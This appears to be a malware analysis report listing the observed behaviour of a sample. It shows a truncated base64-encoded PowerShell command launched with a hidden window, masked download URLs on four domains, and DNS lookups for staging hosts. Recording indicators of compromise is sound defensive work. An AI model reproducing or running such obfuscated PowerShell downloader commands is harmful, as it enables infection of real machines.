Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAGUATgB2ADoAUABVAGIAbABJAGMAWwAxADMAXQArACQAZQBuAHYAOgBwAFUAQgBsAEkAQwBbADUAXQArACcAWAAnACkAIAAoACIAIAAkACgAIABTAHYAIAAnAG8AZgBzACcAIAAnACcAKQAgACIAIAArACAAWwBTAFQAcgBJAG4ARwBdAC...
- 'ok##ot.com':80
- 'mu###iva.com':80
- 'ne##iew.net':80
- 'st####servicios.com':80
- http://ok##ot.com/uC/
- http://mu###iva.com/mYWL/
- http://ne##iew.net/n/
- http://st####servicios.com/esDsJI/
- http://www.st####servicios.com/esDsJI/
- DNS ASK ok##ot.com
- DNS ASK mu###iva.com
- DNS ASK ni###lmedia.com
- DNS ASK ne##iew.net
- DNS ASK st####servicios.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAuACgAIAAkAGUATgB2ADoAUABVAGIAbABJAGMAWwAxADMAXQArACQAZQBuAHYAOgBwAFUAQgBsAEkAQwBbADUAXQArACcAWAAnACkAIAAoACIAIAAkACgAIABTAHYAIAAnAG8AZgBzACcAIAAnACcAKQAgACIAIAArACAAWwBTAFQAcgBJAG4ARwBdAC...' (with hidden window)